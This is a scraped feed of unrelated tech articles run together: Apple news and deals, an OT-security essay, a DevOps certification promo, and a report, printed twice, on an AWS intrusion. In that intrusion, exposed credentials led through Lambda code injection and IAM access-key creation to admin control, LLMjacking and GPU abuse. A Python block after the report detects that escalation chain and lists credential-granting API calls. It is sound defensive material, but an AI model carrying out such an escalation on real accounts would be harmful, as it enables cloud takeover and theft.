Apple says that it aimed to ensure that Claude Agent and Codex run efficiently, with reduced token usage. It is simple to swap between agents in the same project, giving developers the flexibility to choose the agent best suited for a particular task.
While Apple worked with OpenAI and Anthropic for Xcode integration, the Xcode 26.3 features can be used with any agent or tool that uses the open standard Model Context Protocol. Apple is releasing documentation so that developers can configure and connect MCP agents to Xcode.
Using natural language commands, developers are able to instruct AI agents to complete a project, such as adding a new feature to an app. Xcode then works with the agent to break down the instructions into small tasks, and the agent is able to work on its own from there. Here's how the process works:
A developer asks an integrated agent to add a new feature to an app.
The agent looks at the current project to see how it's organized.
The agent checks all relevant documentation, looking at code snippets, code samples, and the latest APIs.
The agent begins working on the project, adding code as it goes.
The agent builds the project, then uses Xcode to verify its work.
If there are errors or warnings, the agent continues to work until all issues are addressed. It is able to access build logs and revise until a project is perfect.
The agent wraps up by providing a summary of everything that happened so developers have a clear view of the implementation.
In the sidebar of a project, developers can follow along with what the agent is doing using the transcript, and can click to see where code is added to keep track of what the agent is doing. At any point, developers can go back to before an agent or model made a modification, so there are options to undo unwanted results or try out multiple options for introducing a new feature.
Apple says that agentic coding will allow developers to simplify workflows, make changes quicker, and bring new ideas to life. Apple also sees it as a learning tool that provides developers with the opportunity to learn new ways to build something or to implement an API in an app.
The release candidate of Xcode 26.3 is available for developers as of today, and a launch will likely follow in the next week or so.
This article, "Xcode 26.3 Lets AI Agents From Anthropic and OpenAI Build Apps Autonomously" first appeared on MacRumors.com
In an email this week, Apple gave customers a final reminder to upgrade their Home app by February 10, 2026. Apple says users who do not upgrade may experience issues with accessories and automations, or lose access to their smart home in the app entirely. In addition, users who do not upgrade will miss out on newer features like robot vacuum cleaner support, and they will not receive important security fixes and performance improvements.
Apple explains how to upgrade the Home app on the iPhone, iPad, or Mac:
Open the Home app
Tap or click on the three dots in the upper-right and navigate to Home Settings
Tap or click on Software Update
Tap or click Update Now, then follow the prompts. All of the homes that you own are updated at the same time.
If you see "This home and all accessories are up to date," then you are on the current version of the app and no further action is required.
Notably, the new version of Apple Home requires a minimum of iOS 16.2, iPadOS 16.2, macOS 13.1, tvOS 16.2, and watchOS 9.2.
This article, "Apple Gives Final Warning to Home App Users" first appeared on MacRumors.com
As in previous years, Replay 2026 ranks your most-played songs on Apple Music from 1 to 100, updating weekly as your listening habits evolve throughout 2026. Apple typically activates Replay in early February, once January listening data has finished processing, allowing subscribers to track their music activity well ahead of the traditional year-end recap.
Unlike a static summary released in December, Replay primarily functions as an evolving playlist. From its first appearance in February, rankings refresh every weekend, gradually building a complete picture of your top songs across the year. By the time December arrives, Replay 2026 becomes a finalized list of your 100 most-streamed tracks.
Replay 2026 can be accessed directly in the Apple Music app by opening the Home tab, scrolling to the "Replay: Your Top Music" section. It is also available through Apple Music for the web, where users can sign in with their Apple ID. Once the Replay 2026 playlist is added to your library, it updates automatically every week.
New generated playlists can sometimes take several hours to appear. If Replay 2026 does not appear after a short while, the most common causes are disabled listening history or insufficient listening activity. Apple requires listening history to be enabled and enough streamed music to generate rankings. Listening history can be checked in Settings under Music, where "Use Listening History" must be turned on. Light or infrequent listening may delay Replay activation, but the playlist should appear automatically once these conditions are met.
Apple Music Replay has been available annually since 2019, originally launching as a web-only experience with an accompanying playlist. Apple gradually expanded Replay's scope in the following years. From 2022 onward, the feature placed greater emphasis on detailed statistics and visual summaries, including structured breakdowns of listening activity across the year. With more recent updates to Apple Music, Replay's detailed views are now available directly inside the Apple Music app, including monthly breakdowns and expanded listening insights alongside the Replay playlist itself.
This article, "Apple Music Replay 2026 Now Available" first appeared on MacRumors.com
The Weibo user claims that since the iPhone 17 lineup proved to be successful with high sales, the iPhone 18 models likely won't have major changes to their appearance. Rather than promoting design changes, Apple is apparently likely to heavily emphasize advancements made with the A20 and A20 Pro chip, which will likely be the first 2nm Apple silicon chips. This upgrade is anticipated to be a key point of discussion around the new devices later this year.
The iPhone 17 Pro models saw a major redesign, following two years of the same design across the iPhone 15 Pro and iPhone 16 Pro. The iPhone 12 Pro, 13 Pro, and 14 Pro also largely shared the same design, as did the iPhone X, iPhone XS, and iPhone 11 Pro. Successive generation-over-generation flagship iPhone redesigns would be unprecedented, making it highly likely that the iPhone 18 Pro will look very similar to the device currently on sale.
The iPhone 18 Pro and iPhone 18 Pro Max are expected to launch later this year, featuring a smaller Dynamic Island, the C2 modem, a simplified Camera Control, a 24-megapixel front-facing camera, and an upgraded main camera with a variable aperture. The iPhone 18 is expected to follow in early 2027, touting many of the same upgrades.
This article, "No Major Design Changes Coming to iPhone 18 Models, Leaker Claims" first appeared on MacRumors.com
Below, we have recapped known or rumored iOS 26.3 and iOS 26.4 features so far.
iOS 26.3
iPhone to Android Transfer Tool
iOS 26.3 makes it easier for iPhone users to switch to an Android device. A new tool allows you to place your iPhone next to an Android device to wirelessly transfer photos, messages, notes, apps, and more. You can also transfer your phone number.
In the iOS 26.3 beta, the new tool can be found in the Settings app, under General → Transfer or Reset iPhone → Transfer to Android. It is available worldwide.
Notification Forwarding in EU
In the EU, iOS 26.3 introduces both a Notification Forwarding feature and AirPods-like proximity pairing for third-party accessories like earbuds and smartwatches.
Apple was required to make these changes to comply with the EU's Digital Markets Act.
End-to-End Encrypted RCS Preparations
As of the second iOS 26.3 beta, Apple appears to be laying the groundwork for carriers to be able to support end-to-end encryption for RCS messages.
More
Starting with iOS 26.3, there is a dedicated section for Weather wallpapers, with three preset options available to choose from. To access them, tap and hold on the Lock Screen and tap on the plus sign in the bottom-right corner of the screen.
iOS 26.3 introduces a new "Limit Precise Location" setting that reduces the location data available to mobile networks to increase user privacy.
iOS 26.1 introduced a Background Security Improvement feature that is designed to provide security updates for Safari, WebKit, and some other system items between iOS software updates. Apple has been testing the feature with updates such as "iOS 26.3 (a)" and "iOS 26.3 (b)," but they do not actually contain any security fixes.
iOS 26.4
Personalized Siri
Last month, Apple and Google announced that Google Gemini will help power a more personalized version of Siri coming this year.
The more personalized version of Siri is expected to be introduced with iOS 26.4, following a lengthy delay. The new capabilities will include better understanding of a user's personal context, on-screen awareness, and deeper per-app controls, but some of this functionality might not be available until iOS 27 later this year.
For example, all the way back at WWDC 2024, Apple showed an iPhone user asking Siri about their mother's flight and lunch reservation plans based on info retrieved from the Mail and Messages apps.
Looking ahead, Apple is reportedly planning to launch a full-out Siri chatbot on iOS 27, allowing users to have ChatGPT-like conversations with Siri.
New Emoji
Last year, the Unicode Consortium previewed some of the new emoji that are expected to be added to the iPhone with iOS 26.4.
Here are nine of the new emoji:
Trombone
Treasure Chest
Distorted Face
Hairy Creature (aka Bigfoot or Sasquatch)
Fight Cloud
Apple Core
Orca
Ballet Dancers
Landslide
Apple most recently added new emoji to the iPhone with iOS 18.4, an update that came out in March last year. iOS 17.4, iOS 16.4, and iOS 15.4 also introduced new emoji over the years, so the timing has become predictable by this point.
More
Macworld's Filipe Espósito leaked some other potential iOS 26.4 features:
If you have credit card information stored in Apple's Passwords app, you will be able to AutoFill those details in third-party apps.
You will be able to create folders in the Freeform app.
Apple is apparently working on a new sports tier for the Apple TV app, but the report did not offer any further details about this.
There are signs of "a new validation system that will check the integrity of the device before logging into Apple ID and iCloud."
A new "Precise Outdoor Location" feature for AirPods in the Find My app.
iOS 26.4 should have many other new features, so stay tuned.
This article, "iOS 26.3 and iOS 26.4 Will Add These New Features to Your iPhone" first appeared on MacRumors.com
Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.
Additionally, there are a few solid discounts on Apple products like AirPods, Apple Watch, and iPad. In this article you'll find deals from third-party retailers collected first, including special Valentine's Day themed sales from AT&T, ZAGG, Casely, and more.
Valentine's Accessory Sales
Best Buy - Save up to 50% on select TVs
Nomad - Save 49% in Nomad's overstock sale
OtterBox - Save 30% on cases, 50% on charging accessories, and more
Anker - Save up to 40% on essential accessories
Sonos - Save up to 20% off soundbars, speakers, and subwoofers
AT&T - iPhone 17 Pro at no cost with eligible trade-in
Samsung - Save on Samsung monitors and TVs
ZAGG - Save up to 75% during clearance event
Casely - Save 10% sitewide with code LOVE10
Casetify - Buy 2 get 20% off with code LOVE2026
AirPods
Amazon this week has major discounts on a few AirPods models, including some of the best prices of the year so far on AirPods 4. You can get the base AirPods 4 for $99.99 on Amazon, down from $129.00.
$29 OFF: AirPods 4 for $99.99
Amazon also has the AirPods 4 with Active Noise Cancellation for $119.99, down from $179.00. We did track both of these at lower prices during the 2025 holiday season, but those deals never returned, and today's prices are the best we've seen so far in 2026.
$59 OFF: AirPods 4 (ANC) for $119.99
AirTag
Amazon has the first generation AirTag 4-Pack for $69.98 this week, down from $99.00. This is a second-best price on the accessory, and just a few dollars away from the record low price.
$29 OFF: AirTag 4-Pack for $69.98
Apple Watch
Amazon this week has the 42mm GPS Apple Watch Series 11 on sale for $299.00, down from $399.00, and the 46mm GPS model for $329.00, down from $429.00. This is only the second time so far in 2026 that we've tracked $100 markdowns on the Series 11, and nearly every aluminum model is on sale right now.
$100 OFF: Apple Watch Series 11 (42mm GPS) for $299.00
$100 OFF: Apple Watch Series 11 (46mm GPS) for $329.00
If you're shopping for cellular models, you can find record low prices on multiple models this week on Amazon. The 42mm cellular Apple Watch Series 11 has hit $399.00, down from $499.00, and the 46mm cellular model has hit $429.00, down from $529.00.
$100 OFF: Apple Watch Series 11 (42mm Cell) for $399.00
$100 OFF: Apple Watch Series 11 (46mm Cell) for $429.00
iPad
There are numerous iPads on sale in early February, and we're starting with a $49 discount on the 11-inch iPad at Amazon. You can get the 128GB Wi-Fi iPad for $299.99, down from $349.00, which is the best price we've tracked in 2026 so far and an overall second-best price.
$49 OFF: 128GB Wi-Fi iPad for $299.99
$49 OFF: 256GB Wi-Fi iPad for $399.99
$49 OFF: 512GB Wi-Fi iPad for $599.99
Amazon this week is also providing record low prices on multiple models of the iPad mini 7, starting at $399.99 for the 128GB Wi-Fi tablet, down from $499.00. Best Buy is also matching many of these iPad deals, and in some cases it has better delivery estimates.
$99 OFF: 128GB Wi-Fi iPad mini 7 for $399.99
$99 OFF: 256GB Wi-Fi iPad mini 7 for $499.99
$99 OFF: 512GB Wi-Fi iPad mini 7 for $699.99
Amazon recently introduced discounts across the M5 iPad Pro lineup, including both 11-inch and 13-inch models. Prices start at $899.99 for the 256GB Wi-Fi 11-inch iPad Pro, down from $999.00.
$99 OFF: 11-inch M5 iPad Pro (256GB Wi-Fi) for $899.99
$149 OFF: 13-inch M5 iPad Pro (512GB Wi-Fi) for $1,349.99
If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.
Deals Newsletter
Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!
This article, "Valentine's Day Deals: Get Low Prices on AirPods, iPad, Apple Watch, and More" first appeared on MacRumors.com
"The humans of Apple TV," says Apple, succinctly.
In a world where AI is increasingly prevalent, it would appear that Apple wants to remind everyone that its original content is still deeply human.
This article, "'Humans of Apple TV'" first appeared on MacRumors.com
Cybercriminals and state-sponsored attackers do pose an enormous and growing threat, especially to the industrial sector. Yet the biggest threat right now is the lack of knowledge transfer when it comes to OT (Operational Technology) security and organisation. The core problem is trusted employees who are retiring.
These people are typically dedicated, knowledgeable and irreplaceable. They know which unlabelled server runs the historian system that the regulators require. They remember why a particular VLAN was configured with seemingly random IP addresses. They know which network routes can only be changed during a production shutdown. Their institutional knowledge thus covers thousands of IP addresses, undocumented network routes and hidden VLANs that are missing from the official documentation.
Their successors, by contrast, arrive expecting modern, well-documented network architectures. Instead, they inherit a complex tangle of legacy systems, proprietary protocols and undocumented configurations, the product of decades of incremental changes and emergency fixes. The discrepancy between expectation and reality creates a knowledge gap that endangers both operational continuity and cybersecurity.
This is a kind of single point of failure that most organisations only recognise once it is already too late.
The departure of experienced OT specialists carries three critical risks that go far beyond simple staffing problems and are usually underestimated in conventional risk assessments:
1. System outages during modernisation
The most immediate and most serious risk lies in unintended consequences during system upgrades or modernisation projects. Older OT networks contain what industry experts call "archaeological layers": decades of incremental modifications, emergency fixes and undocumented configurations that create hidden dependencies.
The biggest risks:
Undocumented legacy systems: Most production sites have at least one Windows NT or Windows XP system that stores indispensable historical data or controls core processes. These systems are often inadequately documented. Removing them during modernisation can mean losing decades of production data that is required for regulatory compliance.
Hidden network dependencies: IP routing tables, VLAN configurations and firewall rules often contain seemingly arbitrary settings that in fact prevent network conflicts or keep critical systems communicating. Changing these configurations without institutional knowledge can trigger a domino effect across several production lines.
Proprietary protocol requirements: Many older industrial systems communicate over proprietary or modified standard protocols. The specific configuration parameters that make this communication work are rarely documented and exist only in the institutional knowledge of departing employees.
Further reading: CISOs need to address OT risks more strongly
2. Longer time-to-value for new equipment and processes
The loss of specific know-how significantly lengthens implementation times for new equipment, process improvements and system integrations. This effect compounds over time and leads to competitive disadvantages and missed optimisation opportunities.
Implementation challenges:
Complex network integration: Installing new equipment, which used to take only a few days, now takes weeks or months. The reason: new staff first have to reverse-engineer the existing network configurations to ensure compatibility.
Inefficient troubleshooting: When integration problems occur, inexperienced staff often have to resort to trial and error instead of drawing on historical knowledge of similar problems and their solutions.
Vendor dependence: Organisations increasingly rely on external system integrators and equipment manufacturers to manage their own networks. This drives up project costs and timelines considerably.
3. Unintended cybersecurity gaps
A hidden risk lies in well-intentioned cybersecurity improvements that actually enlarge the attack surface. New staff trained in modern IT security practices often implement solutions that are unsuitable for OT environments or that unintentionally expose previously isolated systems.
Common patterns that create vulnerabilities:
Flawed network segmentation: Attempts to implement modern network segmentation accidentally connect previously isolated parts of the network. This creates new attack paths that did not exist in the old configuration.
Firewall misconfigurations: Because of insufficient knowledge of legacy protocols, modern firewall deployments can block legitimate industrial communication while still failing to prevent unauthorised access.
These three main risks reinforce one another when they occur at the same time. That is increasingly the case, as organisations try to modernise outdated infrastructure while coping with workforce turnover at the same time. (jm)
Further reading: AI creates new security risks for OT networks
According to new findings from Sysdig’s Threat Research Team, the intruders turned a single exposed credential in a public S3 bucket into full administrative control, demonstrating how AI‑assisted automation has collapsed the cloud attack lifecycle from hours to mere minutes.
The operation, observed in November 2025, reportedly combined a cloud misconfiguration with large language models (LLMs) to compress the entire attack lifecycle.
“The cybersecurity world today is brand new,” said Ram Varadarajan, CEO at Acalvio. “In this threat environment, organizations have to accept that the speed of the breach has shifted from days to minutes. Autonomous intruders can now escalate from initial access to full administrative control in minutes.” Defending against this class of attacks, he added, demands “AI-focused technology” that can reason and respond at the same speed as automated attackers.
Public Buckets to privilege escalation in minutes
The compromise began with valid AWS credentials left exposed in public S3 buckets. Those buckets contained AI-related data, and the associated IAM user had permissions to interact with Lambda and limited access to Amazon Bedrock. “This user was likely intentionally created by the victim organization to automate Bedrock tasks with Lambda functions across the environment,” Sysdig researchers said in a blog post shared with CSO ahead of its publication on Tuesday.
With read access across the environment, the attacker rapidly enumerated AWS services, then escalated privileges by modifying an existing Lambda function. By injecting malicious code into a function that already had an overly permissive execution role, the attacker was able to create new access keys for an administrative user and retrieve them directly from the Lambda execution output.
Jason Soroko, senior fellow at Sectigo, said the root cause was depressingly familiar. “We must look past the novelty of AI assistance to recognize the mundane error that enabled it,” he said. “The entire compromise began because the victim left valid credentials exposed in public S3 buckets. This failure represents a stubborn refusal to master security fundamentals.”
The Lambda code showed signs of LLM generation, including comprehensive exception handling, iterative targeting logic, and even non-English comments.
Lateral movement, LLMjacking, and GPU abuse
Once administrative access was obtained, the attacker moved laterally across 19 distinct AWS principals, assuming multiple roles and creating new users to spread activity across identities. This approach enabled persistence and complicated detection, the researchers noted.
The attackers then shifted focus to Amazon Bedrock, enumerating available models and confirming that model invocation logging was disabled. The researchers said multiple foundation models were invoked, a pattern consistent with “LLMjacking”.
Then, the operation escalated into resource abuse. After preparing keys and security groups, the attackers attempted to initiate high-end GPU instances for machine learning workloads. While most powerful instances failed due to capacity limits, a costly GPU instance was eventually launched, with scripts to install CUDA, deploy training frameworks, and expose a public JupyterLab interface.
Some of the code was found referencing nonexistent repositories and resources, which Sysdig researchers attributed to LLM hallucinations.
Experts argue that the most unsettling takeaway isn’t that AI introduced a new attack technique. It is that AI removed hesitation.“When you strip this attack down to its essentials, what stands out isn’t a breakthrough technique,” said Shane Barney, CISO at Keeper Security. “It’s how little resistance the environment offered once the attacker obtained legitimate access.” He warned that AI collapses reconnaissance, privilege testing, and lateral movement into “a single, rapid sequence,” eliminating the buffer time defenders have historically relied on.
To reduce exposure, Sysdig researchers advised enforcing least privilege across IAM users, roles, and Lambda execution roles, tightly limiting permissions such as “UpdateFunctionCode” and “PassRole”, and ensuring sensitive S3 buckets are never public. Enabling Lambda versioning, turning on Amazon Bedrock model invocation logging, and monitoring for large-scale enumeration activity are also critical, they added.
View the full article
- 0 comments
- 34 views
-
According to new findings from Sysdig’s Threat Research Team, the intruders turned a single exposed credential in a public S3 bucket into full administrative control, demonstrating how AI‑assisted automation has collapsed the cloud attack lifecycle from hours to mere minutes.
The operation, observed in November 2025, reportedly combined a cloud misconfiguration with large language models (LLMs) to compress the entire attack lifecycle.
“The cybersecurity world today is brand new,” said Ram Varadarajan, CEO at Acalvio. “In this threat environment, organizations have to accept that the speed of the breach has shifted from days to minutes. Autonomous intruders can now escalate from initial access to full administrative control in minutes.” Defending against this class of attacks, he added, demands “AI-focused technology” that can reason and respond at the same speed as automated attackers.
Public Buckets to privilege escalation in minutes
The compromise began with valid AWS credentials left exposed in public S3 buckets. Those buckets contained AI-related data, and the associated IAM user had permissions to interact with Lambda and limited access to Amazon Bedrock. “This user was likely intentionally created by the victim organization to automate Bedrock tasks with Lambda functions across the environment,” Sysdig researchers said in a blog post shared with CSO ahead of its publication on Tuesday.
With read access across the environment, the attacker rapidly enumerated AWS services, then escalated privileges by modifying an existing Lambda function. By injecting malicious code into a function that already had an overly permissive execution role, the attacker was able to create new access keys for an administrative user and retrieve them directly from the Lambda execution output.
Jason Soroko, senior fellow at Sectigo, said the root cause was depressingly familiar. “We must look past the novelty of AI assistance to recognize the mundane error that enabled it,” he said. “The entire compromise began because the victim left valid credentials exposed in public S3 buckets. This failure represents a stubborn refusal to master security fundamentals.”
The Lambda code showed signs of LLM generation, including comprehensive exception handling, iterative targeting logic, and even non-English comments.
According to an AWS spokesperson, AWS services and infrastructure are not affected by this issue, and they operated as designed throughout the incident described. “The report describes an account compromised through misconfigured S3 buckets. We recommend all customers secure their cloud resources by following security, identity, and compliance best practices, including never opening up public access to S3 buckets or any storage service, least-privilege access, secure credential management, and enabling monitoring services like GuardDuty, to reduce risks of unauthorized activity. AWS customers who suspect or become aware of malicious activity within their AWS accounts should follow guidance for remediating potentially compromised AWS credentials or contact AWS Support for assistance.”
Lateral movement, LLMjacking, and GPU abuse
Once administrative access was obtained, the attacker moved laterally across 19 distinct AWS principals, assuming multiple roles and creating new users to spread activity across identities. This approach enabled persistence and complicated detection, the researchers noted.
The attackers then shifted focus to Amazon Bedrock, enumerating available models and confirming that model invocation logging was disabled. The researchers said multiple foundation models were invoked, a pattern consistent with “LLMjacking”.
The operation then escalated into resource abuse. After preparing keys and security groups, the attackers attempted to launch high-end GPU instances for machine learning workloads. Although the most powerful instance types failed to launch because of capacity limits, a costly GPU instance was eventually started, with scripts to install CUDA, deploy training frameworks, and expose a public JupyterLab interface.
Some of the code was found referencing nonexistent repositories and resources, which Sysdig researchers attributed to LLM hallucinations.
Experts argue that the most unsettling takeaway isn’t that AI introduced a new attack technique. It is that AI removed hesitation. “When you strip this attack down to its essentials, what stands out isn’t a breakthrough technique,” said Shane Barney, CISO at Keeper Security. “It’s how little resistance the environment offered once the attacker obtained legitimate access.” He warned that AI collapses reconnaissance, privilege testing, and lateral movement into “a single, rapid sequence,” eliminating the buffer time defenders have historically relied on.
To reduce exposure, Sysdig researchers advised enforcing least privilege across IAM users, roles, and Lambda execution roles, tightly limiting permissions such as “UpdateFunctionCode” and “PassRole”, and ensuring sensitive S3 buckets are never public. Enabling Lambda versioning, turning on Amazon Bedrock model invocation logging, and monitoring for large-scale enumeration activity are also critical, they added.
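The escalation chain and the detection advice above, as an added example in Python that is not Sysdig's tooling: it runs two checks over constructed CloudTrail-style events, an enumeration-burst check (many distinct List/Describe/Get APIs from one principal inside a short window) and a check that pairs an UpdateFunctionCode call with a later credential-granting IAM call made under the modified function's execution role. The account id, principal ARNs, function name and role name are made up, and the function-to-role mapping is assumed to come from an earlier inventory (for example lambda GetFunctionConfiguration) rather than being looked up live.

```python
"""Detection logic for the Lambda-assisted escalation chain and the enumeration
burst described in the article. Added example; events, ARNs, account id and
names are constructed and are not indicators from the incident."""
from collections import defaultdict
from datetime import datetime, timedelta

READ_ONLY_PREFIXES = ("List", "Describe", "Get")
# IAM calls that hand a principal durable new credentials or rights
SENSITIVE_IAM_CALLS = {"CreateAccessKey", "CreateLoginProfile", "CreateUser",
                       "AttachUserPolicy", "PutUserPolicy"}


def _ts(event):
    return datetime.strptime(event["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _principal(event):
    return event["userIdentity"]["arn"]


def enumeration_bursts(events, window=timedelta(minutes=5), threshold=10):
    """Map principal -> largest number of distinct read-only APIs it called inside
    any `window`; only principals reaching `threshold` are returned."""
    by_principal = defaultdict(list)
    for ev in sorted(events, key=_ts):
        if ev["eventName"].startswith(READ_ONLY_PREFIXES):
            api = f'{ev["eventSource"]}:{ev["eventName"]}'
            by_principal[_principal(ev)].append((_ts(ev), api))
    hits = {}
    for arn, calls in by_principal.items():
        best = 0
        for i, (start, _) in enumerate(calls):
            seen = {api for t, api in calls[i:] if t - start <= window}
            best = max(best, len(seen))
        if best >= threshold:
            hits[arn] = best
    return hits


def lambda_escalation_chains(events, function_roles, window=timedelta(minutes=30)):
    """Pair each UpdateFunctionCode with a later sensitive IAM call made by the
    modified function's execution role. `function_roles` maps function name ->
    execution role name (assumed to come from an earlier inventory)."""
    ordered = sorted(events, key=_ts)
    findings = []
    for i, ev in enumerate(ordered):
        if ev["eventName"] != "UpdateFunctionCode":
            continue
        fn = ev["requestParameters"].get("functionName")
        role = function_roles.get(fn)
        if role is None:
            continue
        marker = f"assumed-role/{role}/"   # session ARN form of an assumed role
        for later in ordered[i + 1:]:
            if _ts(later) - _ts(ev) > window:
                break
            if later["eventName"] in SENSITIVE_IAM_CALLS and marker in _principal(later):
                findings.append({
                    "modified_by": _principal(ev), "function": fn, "role": role,
                    "followed_by": later["eventName"],
                    "target": later["requestParameters"].get("userName"),
                    "delay_s": int((_ts(later) - _ts(ev)).total_seconds()),
                })
    return findings


# ---- constructed sample data (not from the incident) ----
USER = "arn:aws:iam::111122223333:user/bedrock-automation"
ROLE_SESSION = "arn:aws:sts::111122223333:assumed-role/lambda-admin-role/bedrock-task-runner"
FUNCTION_ROLES = {"bedrock-task-runner": "lambda-admin-role"}


def _ev(time, service, name, arn, **params):
    return {"eventTime": time, "eventSource": f"{service}.amazonaws.com",
            "eventName": name, "userIdentity": {"arn": arn},
            "requestParameters": params}


# eleven distinct read-only calls in eleven seconds: the enumeration phase
RECON = ["iam:ListUsers", "iam:ListRoles", "lambda:ListFunctions", "lambda:GetFunction",
         "s3:ListBuckets", "ec2:DescribeInstances", "bedrock:ListFoundationModels",
         "bedrock:GetModelInvocationLoggingConfiguration", "sts:GetCallerIdentity",
         "iam:ListAttachedRolePolicies", "ec2:DescribeSecurityGroups"]
EVENTS = [_ev(f"2025-11-10T10:00:{i:02d}Z", *call.split(":"), USER)
          for i, call in enumerate(RECON)]
EVENTS += [
    _ev("2025-11-10T10:03:00Z", "lambda", "UpdateFunctionCode", USER,
        functionName="bedrock-task-runner"),
    _ev("2025-11-10T10:03:40Z", "iam", "CreateAccessKey", ROLE_SESSION,
        userName="admin-user"),
]

if __name__ == "__main__":
    print("enumeration bursts:", enumeration_bursts(EVENTS))
    for f in lambda_escalation_chains(EVENTS, FUNCTION_ROLES):
        print("escalation chain:", f)
```

The second check is the one that turns the advice about limiting UpdateFunctionCode and PassRole into a detection: an execution role that never issues IAM credential calls in normal operation should never be seen doing so within minutes of its function's code being replaced. On real CloudTrail data the threshold and windows need tuning per account, and the function-to-role mapping should be refreshed whenever functions are created or reconfigured.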
Apple is rumored to launch the A20 chip with new iPhone models in the fall, and the M6 family of Apple silicon chips in redesigned MacBook Pro models featuring OLED displays later this year. The latest report claims that the company will not move to TSMC's most advanced 2-nanometer manufacturing variant for these chip generations.
TSMC's 2-nanometer family marks the company's transition from FinFET transistors to gate-all-around technology, which is intended to improve power efficiency and performance scaling as chip densities increase. TSMC previously said that its base N2 process will enter mass production in 2026, followed by enhanced variants including N2P and A16 in the second half of the year. This may not be enough time for Apple to introduce chips made with the newer technology to its devices.
N2P is positioned as a higher-performance version of N2, while A16 is designed for high-power and high-complexity chips, particularly for AI applications and data centers. The performance difference between N2 and N2P is expected to be modest. N2P offers roughly a 5% performance gain at the same power level, but comes at a higher manufacturing cost, which helps explain why Apple is expected to remain on N2 for its A- and M-series chips this year.
Competitors including Qualcomm and MediaTek are expected to adopt N2P for their flagship mobile chips in order to reach higher peak clock speeds. TSMC apparently expects the 2-nanometer generation to have a long lifecycle and potentially scale beyond its 3-nanometer family. Companies including AMD, Google, and Amazon are expected to adopt 2-nanometer processes for future CPUs, GPUs, and AI chips.
Supply availability is also thought to be a factor. Demand for 2-nanometer manufacturing has apparently exceeded expectations, with much of the initial N2 capacity already reserved by leading customers such as Apple. This early capacity allocation reduces the need for Apple to move to N2P simply to secure production volume for future A-series and M-series chips.
This article, "Apple Seemingly Avoiding Latest Chip Tech for New iPhones and Macs" first appeared on MacRumors.com
In his Power On newsletter on Sunday, Gurman noted that inventory of the current Studio Display is running low on Apple's online store and at its retail stores, although this has generally been the case for a while now. Extended shipping estimates on Apple's online store can sometimes hint at an upcoming product refresh.
Last month, an unreleased Apple monitor with the model number A3350 surfaced in a Chinese regulatory database, and it is likely the Studio Display 2.
Unfortunately, the database entry did not reveal any new details about the Studio Display 2, beyond indicating that it will still have an LCD display instead of an OLED display. However, mini-LED backlighting remains a possibility.
There have been many reports about a new Studio Display being in the works, with rumored features including mini-LED backlighting, ProMotion support for up to a 120Hz refresh rate, HDR support, and either an A19 or A19 Pro chip.
The current Studio Display was filed in the same Chinese database around three months before it launched, so perhaps the next Studio Display will be released around March or April, but Apple has until the end of June if we go by Gurman's timeframe. It would make sense for Apple to unveil a new Studio Display alongside the next Mac Studio with M5 Max and M5 Ultra chips, or perhaps a new Mac mini, but it is not strictly necessary.
If the next Studio Display receives mini-LED backlighting and HDR support, its maximum brightness and contrast ratio would be higher than the current model. And a newer A19 or A19 Pro chip — up from the A13 Bionic currently — should contribute to performance improvements, camera-related enhancements, and more.
The current Studio Display features a 27-inch 5K screen, a 60Hz refresh rate, up to 600 nits brightness, a built-in camera and speakers, one Thunderbolt 3 port, and three USB-C ports. In the U.S., pricing starts at $1,599.
This article, "Apple's Studio Display 2 Reportedly on Track to Launch This Year With These New Features" first appeared on MacRumors.com
Samsung Display will reportedly begin mass production of eighth-generation OLED displays for the device in May. Samsung is planning to ship two million of these displays to Apple by the end of the year. The panels will be sent to Foxconn from the third quarter of 2026 for assembly into the final machines.
Some components for the device are said to still be in development, since Apple has been changing the design of some parts to reduce manufacturing costs. China's BOE is also hoping to supply Apple with OLED displays for the MacBook Pro, but only units with Samsung displays will be available this year.
The fourth quarter of 2026 runs from October to December. The OLED MacBook Pro is expected to feature 14- and 16-inch display size options, M6-series chips, and the first complete redesign of the device since 2021.
This article, "Report: OLED MacBook Pro to Launch This Year" first appeared on MacRumors.com
DevOps is no longer just a buzzword; it’s a culture and set of practices that is crucial for modern software development and IT operations. As organizations seek faster deployment cycles, more reliable releases, and better collaboration between development and operations teams, the need for skilled professionals who can implement DevOps practices becomes more evident.
A Certified DevOps Engineer (CDE) is a credential that demonstrates your proficiency in implementing and managing DevOps practices across an organization. Earning the CDE certification can significantly elevate your career, offering you opportunities to work with cutting-edge technologies, lead DevOps transformations, and become a key player in any technology-driven organization. Whether you are an engineer, manager, or IT professional, this certification helps validate your skills and opens doors to high-impact roles.
What is the Certified DevOps Engineer (CDE) Certification?
The Certified DevOps Engineer certification is an industry-recognized credential designed to validate the skills and knowledge required to manage and implement DevOps practices. This certification focuses on critical aspects of DevOps, including automation, continuous integration and delivery (CI/CD), infrastructure management, cloud platforms, and collaboration across development, operations, and security teams.
The certification covers a broad range of topics, from scripting and automation to cloud services and containerization, helping professionals gain a comprehensive understanding of the tools and practices essential for successfully implementing DevOps. It is ideal for engineers, IT professionals, and managers who want to specialize in DevOps practices, helping them to streamline workflows, improve quality, and accelerate product delivery.
Who Should Take the Certified DevOps Engineer Certification?
The CDE certification is ideal for professionals who:
- Are involved in software development and operations.
- Want to enhance their skills in automation, CI/CD, infrastructure as code (IaC), and cloud technologies.
- Seek career advancement in DevOps or related roles.
- Are aiming to lead DevOps transformation initiatives in their organizations.
It’s also perfect for engineers, managers, and architects who are looking to bridge the gap between development and operations.
Skills You’ll Gain with CDE Certification
By completing the Certified DevOps Engineer certification, you will develop the following skills:
- Automation of Deployment Processes: Implementing automated pipelines and release management.
- Infrastructure Management: Managing and provisioning infrastructure using IaC tools like Terraform, Ansible, etc.
- Continuous Integration/Continuous Delivery (CI/CD): Building and managing pipelines for seamless code integration and delivery.
- Cloud Technologies: Working with AWS, Azure, and Google Cloud for scalable and reliable infrastructure.
- Collaboration and Communication: Fostering effective collaboration between development, operations, and QA teams.
Real-World Projects You Can Tackle After This Certification
As a Certified DevOps Engineer, you should be able to work on the following real-world projects:
- Building CI/CD pipelines for automated testing and deployment: Automating code validation and deployment pipelines using Jenkins, GitLab CI, and others.
- Implementing Infrastructure as Code (IaC) with Terraform or CloudFormation: Automating infrastructure provisioning to create reproducible and scalable environments.
